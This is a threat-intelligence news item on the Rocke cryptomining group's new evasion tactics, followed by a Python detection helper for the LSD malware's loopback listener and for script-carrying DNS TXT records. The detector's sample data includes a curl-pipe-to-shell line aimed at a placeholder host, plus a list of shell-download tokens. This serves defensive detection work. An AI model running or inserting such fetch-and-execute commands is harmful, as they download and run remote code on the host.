Rocke Threat Actor Group Switches to New Tactics to Evade Detection
October 17, 2019 | Threat Actors
- The Chinese group has changed its Command and Control infrastructure (C&C server).
- It has made some updates to the LSD malware’s source code that includes the addition of the “StartHttpServer” function.
What is the problem?
Researchers have observed that the Chinese cryptomining threat actor group Rocke has changed its tactics, techniques, and procedures (TTPs) to evade detection.
What do we know about the group?
Rocke is a threat actor group that primarily focuses on cryptocurrency mining on compromised machines. This threat group was first spotted by researchers from Cisco Talos in August 2018. This group is known for using malware written in Go.
What’s new?
Rocke has made new updates to its tactics, which include:
- The Chinese group has changed its Command and Control infrastructure (C&C server).
- The group has switched from hosting the initial setup script on Pastebin to self-hosting it.
- It has made some updates to the LSD malware source code, including the addition of a “StartHttpServer” function.
- With this change, the malware starts a web server listening on localhost, TCP port 65533.
- Rocke has also added new functionality to the LSD malware for exploiting Jenkins servers.
- Instead of hosting the setup script and its version updates on a dedicated host, the threat group is now serving them from DNS TXT records.
“Rocke keeps evolving its TTPs in attempts to remain undetected. By moving away from hosting scripts on Pastebin to self-hosted and DNS records, the threat actor is more protected against potential take-downs that could prevent ongoing malicious activity. It is expected that the group will continue to exploit more vulnerabilities to mine additional cryptocurrencies in the near future,” researchers noted.
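Two of the changes listed above leave host- and network-level traces a defender can look for: the LSD web server bound to localhost on TCP port 65533, and setup scripts or version strings delivered inside DNS TXT answers. The following detection helpers are an added example written for this page, not code from Cyware or from the researchers quoted above. They assume listener lines in the format printed by `ss -ltnp` and resolver log records as (name, type, answer) tuples; every domain name, PID and TXT payload in the sample data is a constructed placeholder, not a real indicator.

```python
"""Detection helpers for two Rocke/LSD TTP changes: a loopback HTTP listener
on TCP 65533, and setup scripts or version strings carried in DNS TXT records.

Added example, not part of the original article. Input formats are assumed:
  * socket lines as printed by `ss -ltnp` (one socket per line)
  * resolver / passive-DNS records as (query name, record type, answer data)
All sample values below are constructed placeholders.
"""
import re

# Port the article reports the updated LSD malware binds on localhost.
LSD_LOCAL_PORT = 65533

# Tokens that suggest a TXT answer carries a setup script rather than
# ordinary mail-authentication or domain-verification data.
SCRIPT_TOKENS = ("curl ", "wget ", "/bin/sh", "bash -c", "base64 -d", "chmod +x")

# Long TXT records are suspicious unless they are a known benign kind
# (SPF, DKIM and DMARC records are routinely several hundred bytes).
TXT_LENGTH_THRESHOLD = 200
BENIGN_TXT_PREFIXES = ("v=spf1", "v=DKIM1", "v=DMARC1")

# Parses e.g.  LISTEN 0 128 127.0.0.1:65533 0.0.0.0:* users:(("lsd",pid=4242,fd=5))
SS_LINE = re.compile(
    r'^\S+\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+'
    r'(?:\s+users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+))?'
)


def suspicious_listeners(ss_lines):
    """Return (process, pid, address, port) for loopback listeners on LSD_LOCAL_PORT."""
    hits = []
    for line in ss_lines:
        m = SS_LINE.match(line.strip())
        if not m:  # header line or unrelated output
            continue
        addr, port = m.group("addr"), int(m.group("port"))
        if port == LSD_LOCAL_PORT and addr in ("127.0.0.1", "[::1]", "::1"):
            hits.append((m.group("proc") or "?", m.group("pid") or "?", addr, port))
    return hits


def suspicious_txt_records(records):
    """Return query names whose TXT answers look like hosted scripts."""
    flagged = []
    for name, rtype, data in records:
        if rtype != "TXT":
            continue
        text = data.strip('"')
        if text.startswith(BENIGN_TXT_PREFIXES):
            continue
        if len(text) > TXT_LENGTH_THRESHOLD or any(t in text for t in SCRIPT_TOKENS):
            flagged.append(name)
    return flagged


# Constructed sample input (placeholders only).
SAMPLE_SS = [
    "State Recv-Q Send-Q Local Address:Port Peer Address:Port Process",
    'LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=811,fd=3))',
    'LISTEN 0 128 127.0.0.1:65533 0.0.0.0:* users:(("lsd",pid=4242,fd=5))',
    'LISTEN 0 511 127.0.0.1:6379 0.0.0.0:* users:(("redis-server",pid=902,fd=6))',
]
SAMPLE_DNS = [
    ("example.com", "TXT", '"v=spf1 include:_spf.example.net ~all"'),
    ("mail._domainkey.example.com", "TXT", '"v=DKIM1; k=rsa; p=' + "A" * 300 + '"'),
    ("update.placeholder.invalid", "TXT", '"ver=20191017"'),
    ("setup.placeholder.invalid", "TXT",
     '"curl -fsSL http://placeholder.invalid/x.sh | /bin/sh"'),
    ("example.com", "A", "192.0.2.10"),
]

if __name__ == "__main__":
    for hit in suspicious_listeners(SAMPLE_SS):
        print("loopback listener on LSD port:", hit)
    for name in suspicious_txt_records(SAMPLE_DNS):
        print("TXT record carrying script-like content:", name)
```

Note what the TXT check does not catch: a bare version string such as `ver=20191017` looks like any other short TXT answer, so it is only findable by baselining which names a host normally queries for TXT records and alerting on newly seen ones. The listener check is deliberately narrow (loopback plus the single reported port) to keep false positives low on hosts that run many local services.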